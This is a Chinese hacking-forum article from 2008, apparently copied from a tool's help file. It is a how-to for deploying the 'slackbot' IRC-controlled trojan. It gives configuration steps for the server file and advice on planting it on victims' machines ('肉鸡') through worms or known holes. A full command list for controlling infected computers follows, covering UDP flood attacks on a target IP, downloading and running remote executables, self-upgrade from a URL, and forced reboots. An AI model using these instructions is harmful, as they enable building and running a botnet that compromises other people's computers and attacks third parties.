我爱黑客网首页 设为首页
加入收藏
联系我们
 首 页  技术文章 下载中心 站长学院 交流论坛
 软件:
 文章:        教程:
 推荐: 我爱黑客网论坛
 
 
 
 
   
黑软: Q Q 软件 木马间谍 探嗅监听 溢出攻击 加密解密 漏洞扫描 脚本注入 远程控制 综合利用 聊天工具  
 
技术文章: 爱黑新闻 | 黑客攻防 | 安全防御 | 程序设计 | 系统操作 | 网络技术 | 本站动态 | 业界动态 | 安全公告 | 病毒公告
 
 
您当前的位置:我爱黑客网 -> 黑客攻防 -> 攻防实战 -> 文章内容  
栏目导航
· Q Q 攻防 · 黑客入门
· 攻防实战 · 安全初步
· 工具详解 · 黑客教程
· 漏洞研究 · 黑客编程
· 技术杂谈 · Exploit
热门文章
· 骇客学堂:简单入侵个..
· 轻松入侵个人免费空间..
· 教你入侵六合彩网拿会..
· 无线攻防:破解WEP密钥..
· 会员QQ重大漏洞
· 手把手教你入侵 win20..
· 怎样不用密码进入Wind..
· 我也做黑客:简单入侵个..
· 网吧冲钱从概念到实践..
· 黑客入门者如何获取肉..
· 黑客高手必懂基础内容..
· 我这样破解万象免费上..
相关文章

· [组图] 一次典型的虚..
· 入侵Tomcat服务器一..
· [组图] 对网易的一次..
· 一次入侵兼反入侵的..
· 记一次成功入侵Sola..
· 实例精彩讲解一次li..
· 记一次前所未有巧妙..
· [组图] 关键旅游之旅..
· [组图] 一次意外的入..
· 一次利用show files..
查看更多与一次入侵实战解说(图)相关内容

一次入侵实战解说(图)
作者:我爱黑客网  来源:http://www.5ihack.com/  发布时间:2008-7-10 19:16:49  发布人:ghostfire

减小字体 增大字体

1:要有IRC的一点点知识 (没有的话不要看了) 

第一:打开slackbot会有一下4个文件 
sbconfig.exe(178k)------------------服务端设置文件 
server.exe(9k)----------------------服务端(请务在自己机器运行) 
slack.txt(5k)-----------------------使用帮助(本文件) 
irccommamd.txt(20k)-----------------irc简单命令说明 
我们打开sbconfig.exe然后用sbconfig.exe打开server.exe出现以下的东西 
安全中国视频中心精选
等级考试一级OFFICE视频教程 Visual Foxpro多媒体教程网页设计与制作多媒体教程
FIF小组的 Photoshop7 视频教程FIF 常用软件视频教程FIF Fireworks视频教程
PowerPoint视频菜鸟必学系列视频教程金鹰 CorelDraw 系统视频教程
金鹰工作室 word2003 教程金鹰Fireworks视频教程国内100强黑客网站统计


用sbconfig.exe打开server.exe会出现 

假如我们要拉马上sunnet.org的某个房间的话就这样(假设房间的名字是hack 
我们就在sbconfig.exe的irc服务器里填sunnet.org然后房间就填hack 
密码那里呢我们就填1234 验证也是1234(这个用来控制你的马!) 
我们填好了以后呢要怎么做呢!对了我们刚刚已经用sbconfig.exe配置好了server.exe 
配置好以后我们只需要server.exe 
你只要在你的肉鸡上运行这个server.exe那么你的肉鸡就跟马一样拉到irc服务器 
sunnet.org的hack房间了! 
我们就找个IRC(我建议用mirc)然后用这个irc到房间里去! 
我们先用 @验密码 1234 (@验密码 password)这个命令唤醒我们的马!然后怎么做呢?倒~~~~~~当然是跟骑士我一样骑马去杀敌啊! 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
怎么样配置马比较快呢?给个提示用流光的种植者!或者用蠕虫病毒中的某个部分! 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
以下是一些命令知识: 

slackbot中文版详细使用说明 

首先去木马帝国下载slackbot中文版,地址是http://www.mmbest.com ;
解压后得到得到3个文件. 

sbconfig.exe(178k)------------------服务端设置文件 
server.exe(9k)----------------------服务端(请务在自己机器运行) 
slack.txt(5k)-----------------------使用帮助(本文件) 
irccommamd.txt(20k)-----------------irc简单命令说明 

slackbot是一个没有客户端的木马,要使用他首先你要下载一个irc客户端软件,一般是mirc,此客户端也可以在木马帝国得到,目前最新版为5.91,mirc591的解压与安装同一般的共享软件.如果你以前没有用irc聊过天,建议你先熟悉irc的简单命令的操作.(附irc的命令简介) 

在使用slackbot前,你首先得确定你得马儿将要连接的服务器和房间,比如服务器是irc.wz163.net 端口是 6667房间是 #木马帝国,这3项参数是必须的,你首先要去该服务器注册你的昵称和房间,使用[ /msg nickserv register 密码 邮件 ]可以注册昵称,使用[ /msg chanserv register #channel 密码 说明 ]可以注册一个房间,接着打开sbconfig.exe, 

选文件-->打开-->然后选定server.exe-->程序会加载服务端配置 

服务器:当然是填你要马儿去的服务器了,比如 irc.wz163.net 
端口: 可以用irc默认的6667或者其他的端口,看服务器的支持了. 
服务器密码: 一般服务器都不设进入密码的,可以将这个钩去除 
irc房间: 就是你刚才注册的那个房间了 
密码: 这是关键,是你的马儿的控制密码,没有他你就没法控制你的马儿了 
重复: 重复刚才填的密码 

现在按保存就可以了.现在就是寻找目标了,至于你用冰河漏洞做目标还是用U漏洞做目标,我可不管了.请好自为之,不要太过分就好了. 

当你的马儿运行服务端后,会很快连上你已经设定好的irc服务器的指定房间,你就在里面等着他吧,一般马儿会以随机的26个小写字母做昵称,很好认.slackbot是个用命令控制的木马,下面是他的命令行表示方式,你可以在公聊也可以在小窗使用命令. 

*************************************************** 
以下的几个命令是无须验证密码都可以用的 

@@看------------------这命令是看马儿的信息(主要是什么版本) 

@@sysinfo-------------这命令是看感染了slackbot的电脑中用的是什么系统 

@验密码 password------验证你的马的密码,password是你在设置服务器时自己设置的那个密码 

**************************************************** 
以下的命令是要验证了密码后才可使用的命令 

@验密码 password------验证服务端口令,这里的password就是你刚设的密码. 

@@raw irc命令---------使用irc命令(例:@@raw join #Suck这命令使马儿进入一个叫#Suck的房间) 

@说话 房间或某个 要说的话 ---------在房间内公开说话或对某个人发悄悄话 
例:@说话 #Suck 杀了你 这命令使马儿在#Suck的房间说一句"杀了你"的话 
例:@说话 Meteor 在吗? 这命令会给叫Meteor的在线聊友发一句"在吗?"的悄悄话 

@@进入 #房间-----------进入一个房间 
例:@@进入 #Meteor 这命令使马儿进入一个叫#Meteor的房间 

@@part #房间-----------离开房间 
例:@@part #Meteor 这命令使马儿离开#Meteor的房间 

@@改名 新的名字--------改变昵称 
例:@@改名 萧秋水 这命令使马儿的名字改为"萧秋水" 

@@rndnick--------------随机改变昵称 

@@cycle 次数 #房间-----变换昵称进出一个频道(慎用) 
例:@@cycle 2 #Meteor 这命令使马儿退出#Meteor然后又进来,重复两次 

@攻击 IP 发送的数据包数目 延迟时间 数据包大小-----------------udp远程攻击 
例:@攻击 24.24.24.24 200 100 4096 这命令使马儿向24.24.24.24这个IP在100毫秒内发送200个每个大小为4096的udp数据包作为攻击 

@@visit 次数 url---------访问指定url,可以增加自己主页的访问量 
例:@@visit 5 http://www.yahoo.com ;这命令使马儿访问http://www.yahoo.com五次 

@@webdl ----------下载文件 
例:@@webdl http://www.server.com/server.exe ;c:\server.exe 这命令使你的马儿从www.server.com中下载一个叫server.exe的文件,保存在马儿的c:\下 

@执行 ---------------运行文件 
例:@执行 c:\windows\notepad.exe 这命令在感染了slackbot的电脑上运行了notepad.exe的程序 

@超级升级 ------------从指定url升级你的马 
例:@超级升级 http://www.myweb.com/new.exe ;这命令成功执行后,会将原来的slackbot的服务器从进程中杀掉,并将在注册表的键杀掉,然后执行你上载上去的那个new.exe文件。命令主要是用于升级你的马,有时因为你自己下马的房间被人发现了或者密码被人发现了,你就要重新再设置一个新的slackbot服务器,将房间改变或将密码改变,然后使用这个命令就可以将旧的slackbot服务器删掉,装入你新设置的那个服务器程序了。 

@@reboot-------------------重启对方的电脑 

@@restart------------------重启slackbot服务器程序 

@@quit---------------------马儿退出irc服务器,要等重启后才会重新进入那个房间 

@@exit---------------------退出irc服务器,将进程亦杀掉,但没有删除注册表的键值 

查看更多与一次入侵实战解说(图)相关内容

[ ] [返回上一页] [打 印] [收 藏]
上一篇文章:
下一篇文章:
      收费资源我做主之手法(入侵)篇(图)       通过asp入侵web server,窃取文件毁坏系统
∷相关文章评论∷   (评论内容只代表网友观点,与本站立场无关!) [发表评论]
 
 
 
 
晋ICP备05008232   维护网络安全、传播安全技术才是我们的目标! 
 
关于本站 - 网站帮助 - - 下载声明 - 友情连接 -网站地图